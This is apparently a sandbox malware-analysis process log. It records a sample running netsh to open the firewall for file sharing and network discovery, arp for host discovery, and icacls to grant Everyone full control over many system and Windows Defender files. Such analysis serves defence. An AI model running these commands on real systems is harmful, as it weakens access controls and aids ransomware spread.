C:\Windows\system32\netsh.exe"netsh" advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes3⤵
-
-
C:\Windows\system32\netsh.exe"netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes3⤵
-
-
C:\Windows\system32\netsh.exe"netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Cache\data_0 /grant Everyone:F /T /C /Q3⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
-
-
C:\Windows\system32\arp.exe"arp" -a3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Public\Libraries\RecordedTV.library-ms /grant Everyone:F /T /C /Q3⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\regid.1991-06.com.microsoft\regid.1991-06.com.microsoft Office 16 Click-to-Run Extensibility Component.swidtag /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\regid.1991-06.com.microsoft\regid.1991-06.com.microsoft Office 16 Click-to-Run Licensing Component.swidtag /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\regid.1991-06.com.microsoft\regid.1991-06.com.microsoft Office 16 Click-to-Run Localization Component.swidtag /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\regid.1991-06.com.microsoft\regid.1991-06.com.microsoft_Windows-10-Pro.swidtag /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Package Cache\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}v14.21.27702\packages\vcRuntimeMinimum_amd64\cab1.cab /grant Everyone:F /T /C /Q3⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\state.rsm /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Package Cache\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}\state.rsm /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Package Cache\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\packages\vcRuntimeMinimum_amd64\cab1.cab /grant Everyone:F /T /C /Q3⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Package Cache\{CB0836EC-B072-368D-82B2-D3470BF95707}v12.0.40660\packages\vcRuntimeMinimum_amd64\cab1.cab /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Package Cache\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\state.rsm /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Package Cache\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}v12.0.40660\packages\vcRuntimeAdditional_amd64\cab1.cab /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Package Cache\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\packages\vcRuntimeAdditional_amd64\cab1.cab /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Package Cache\{12578975-C765-4BDF-8DDC-3284BC0E855F}v14.21.27702\packages\vcRuntimeAdditional_amd64\cab1.cab /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Oracle\Java\java.settings.cfg /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Oracle\Java\installcache_x64\baseimagefam8 /grant Everyone:F /T /C /Q3⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows Security Health\Logs\SHS-04102021-065959-3-1-15063.0.amd64fre.rs2_release.170317-1834.bin /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows Security Health\Logs\SHS-04102021-070122-3-1-15063.0.amd64fre.rs2_release.170317-1834.bin /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows Security Health\Logs\SHS-04102021-070349-3-1-15063.0.amd64fre.rs2_release.170317-1834.bin /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows Security Health\Logs\SHS-04102021-070541-3-1-15063.0.amd64fre.rs2_release.170317-1834.bin /grant Everyone:F /T /C /Q3⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSScan\WelcomeScan.jpg /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSFax\VirtualInbox\en-US\WelcomeFax.tif /grant Everyone:F /T /C /Q3⤵
- Modifies data under HKEY_USERS
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSFax\Common Coverpages\en-US\confident.cov /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSFax\Common Coverpages\en-US\fyi.cov /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSFax\Common Coverpages\en-US\generic.cov /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSFax\Common Coverpages\en-US\urgent.cov /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows Live\WLive48x48.png /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Support\MPDetection-04102021-065958.log /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Support\MPLog-04102021-065958.log /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Support\MpWppTracing-04102021-065958-00000003-ffffffff.bin /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\mpcache-5C093E9FCD1354685BA9043E2217B5B122F667C4.bin /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\mpcache-5C093E9FCD1354685BA9043E2217B5B122F667C4.bin.80 /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\mpcache-5C093E9FCD1354685BA9043E2217B5B122F667C4.bin.83 /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\mpcache-5C093E9FCD1354685BA9043E2217B5B122F667C4.bin.A0 /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\MpDiag.bin /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Mput\MputHistory\22\109003 /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Mput\MputHistory\21\260 /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Mput\MputHistory\19\272 /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Mput\MputHistory\19\328 /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Mput\MputHistory\18\107001 /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Mput\MputHistory\18\107002 /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Mput\MputHistory\18\109002 /grant Everyone:F /T /C /Q3⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Mput\MputHistory\17\109001 /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Mput\MputHistory\17\193 /grant Everyone:F /T /C /Q3⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Mput\MputHistory\15\262 /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Mput\MputHistory\11\200 /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Mput\MputHistory\05\191 /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Mput\MputHistory\01\198 /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Mput\MputHistory\01\271 /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Mput\MputHistory\00\192 /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\History\CacheManager\266D1CA4-0000-0000-0000-500600000000-0.bin /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Network Inspection System\Support\NisLog.txt /grant Everyone:F /T /C /Q3⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Definition Updates\Default\MpAsBase.vdm /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Definition Updates\Default\MpAsDlta.vdm /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Definition Updates\Default\MpAvBase.vdm /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Definition Updates\Default\MpAvDlta.vdm /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Definition Updates\Default\NisBase.vdm /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Definition Updates\Default\NisFull.vdm /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppxProvisioning.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\wfp\wfpdiag.etl /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\SystemData\S-1-5-18\ReadOnly\LockScreen_Z\LockScreen___1024_0768_notdimmed.jpg /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Java Development Kit\Reference Documentation.url /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Java\Get Help.url /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Java\Visit Java.com.url /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\RetailDemo\OfflineContent\Packages\Microsoft.MicrosoftRetailDemoProvisioning_8wekyb3d8bbwe\Microsoft.MicrosoftRetailDemoProvisioning_8wekyb3d8bbwe.appx /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\RetailDemo\OfflineContent\Packages\Microsoft.MicrosoftRetailDemoProvisioning_8wekyb3d8bbwe\Microsoft.MicrosoftRetailDemoProvisioning_8wekyb3d8bbwe_License.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\RetailDemo\OfflineContent\Packages\Microsoft.MicrosoftRetailDemoProvisioning_8wekyb3d8bbwe\Microsoft.NET.Native.Runtime.1.1.DemoProvisioning.appx /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\RetailDemo\OfflineContent\Packages\Microsoft.DemoHub_8wekyb3d8bbwe\Microsoft.DemoHub_8wekyb3d8bbwe.appx /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\RetailDemo\OfflineContent\Packages\Microsoft.DemoHub_8wekyb3d8bbwe\Microsoft.DemoHub_8wekyb3d8bbwe_License.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\RetailDemo\OfflineContent\Packages\Microsoft.DemoHub_8wekyb3d8bbwe\Microsoft.NET.Native.Runtime.1.1.DemoHub.appx /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\RetailDemo\OfflineContent\Packages\Microsoft.DemoHub_8wekyb3d8bbwe\Microsoft.VCLibs.x64.14.00.DemoHub.appx /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\RetailDemo\OfflineContent\Packages\Microsoft.BasicAttractLoop_8wekyb3d8bbwe\Microsoft.BasicAttractLoop_8wekyb3d8bbwe.appx /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\RetailDemo\OfflineContent\Packages\Microsoft.BasicAttractLoop_8wekyb3d8bbwe\Microsoft.BasicAttractLoop_8wekyb3d8bbwe_License.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\RetailDemo\OfflineContent\Packages\Microsoft.BasicAttractLoop_8wekyb3d8bbwe\Microsoft.NET.Native.Runtime.1.1.BasicAttractLoop.appx /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\RetailDemo\OfflineContent\Packages\Microsoft.BasicAttractLoop_8wekyb3d8bbwe\Microsoft.VCLibs.x64.14.00.BasicAttractLoop.appx /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\RetailDemo\OfflineContent\Microsoft\Content\Neutral\AppList\AppList.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\RetailDemo\Office\ConfigureO16DemoMode.bat /grant Everyone:F /T /C /Q3⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\RetailDemo\Office\ConfigureO16DemoModeJapanese.bat /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\LfSvc\Geofence\GeofenceApplicationID.dat /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\DeviceMetadataStore\en-US\34e548a8-3268-4dde-bedf-c40f9b6c814a.devicemetadata-ms /grant Everyone:F /T /C /Q3⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\DeviceMetadataStore\en-US\63921eef-8415-4368-9201-f0df4af5778f.devicemetadata-ms /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\DeviceMetadataCache\dmrc.idx /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\tokens.dat /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\02305155-8ac1-1189-ff55-b7119a53887c.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\03f8974b-362e-33e3-2e0b-c7bc2ea01c63.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\0890ad2f-b74f-c384-f684-9c33f8f67924.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\09ec127d-8158-a906-c12f-44a86e3e994f.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\0a8c1492-65ca-6a01-de25-0e183559d10d.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\109c9870-7988-c77e-8ad0-376ab6e81351.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\13ba8772-845b-29a1-ae9e-fb2793ccf4ea.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\1dae14df-4c42-28af-691e-10cc07a990b4.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\1e225998-faa0-5fd4-4db7-5e7686ee3b47.xml /grant Everyone:F /T /C /Q3⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\215f9712-9fca-a3f8-5b11-660eefc73b96.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\2657f7c0-8294-58c3-f394-15fe18ba174a.xml /grant Everyone:F /T /C /Q3⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\26943e1f-42ed-f190-2895-3bc2b8c4176d.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\28502d06-9d29-8514-1e5d-64447116d798.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\28748306-9f02-a5d7-6ded-4459fddadc31.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\3c8c7eb3-7a1d-7981-0472-571cdd1d1292.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\3ebdb897-991b-934f-ee13-2ca21ed81938.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\3f586f55-284b-e455-06b2-84c84e8d0d2d.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\4c4ecbc0-0ec0-3929-aebb-a931a339fb23.xml /grant Everyone:F /T /C /Q3⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\5b0a39aa-16e0-a938-f694-656664c7be15.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\600364a7-e11c-efda-2c12-eac40e75f19a.xml /grant Everyone:F /T /C /Q3⤵
- Modifies data under HKEY_USERS
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\630a70e7-1832-4f42-e2a2-5d35fdddc45f.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\6e90ed81-9187-fa62-ce90-f18d7bed6b12.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\71c8f37a-a7b9-aff0-6de0-9b276c089ad6.xml /grant Everyone:F /T /C /Q3⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\71ef3df1-f4b1-69cd-793a-48e165e282aa.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\7309084a-bb6f-20c3-ea54-aa108ceab1ae.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\7646fa0f-b52c-71a8-3aed-950dd1668c09.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\865e8f30-20a1-9528-bb48-42999b5b2aa8.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\8d56e57b-8663-136d-ff69-a004e217825a.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\9d3ad23c-c6b8-7fb5-e4ab-f5d0a66dcfbc.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\a1e5b165-0532-a6a3-f542-0c5c162be3e1.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\ac116a72-b6b1-d558-23f6-10796e634d41.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\b34b197c-c0ed-bf12-c9bb-44e883c66a9d.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\b81d7e70-84e7-b16a-e3d0-1e7aa2f1232d.xml /grant Everyone:F /T /C /Q3⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\bbfbe8ad-1a35-a7f3-33bc-40912bf89dfb.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\bcda97bb-bfd0-2a72-3c90-c8518f3d09ee.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\c3d42a1a-2f3f-a4a9-6a04-cc1b234485fb.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\c94a6c18-d496-da1c-8a02-fc6976e0145e.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\ca947da2-7e9a-7249-8095-bceb379c6f74.xml /grant Everyone:F /T /C /Q3⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\cb692946-a9f3-639d-1064-a6d75a01b9c3.xml /grant Everyone:F /T /C /Q3⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\d1ecfce2-f845-c1e9-052b-d2f457c135e6.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\d508ba05-d8aa-2836-484d-3833d22fe185.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\d90ad1eb-bec3-18c1-8c97-eef683ba6a1f.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\e0e43bae-32f3-2aa6-ce7d-e4ee1e84a462.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\e2a686b1-b02a-b3e7-90cb-3fa0d708ce04.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\e335baf1-18ab-73fe-e089-3fa0a6e71a35.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\e64ffef1-e246-b632-595b-56076a3fa776.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\e8ac9388-7c9c-19cc-fd4d-cb72bb1544ea.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\e8fff2df-6041-8f21-3df7-db31661aa09b.xml /grant Everyone:F /T /C /Q3⤵
- Modifies file permissions
-
-
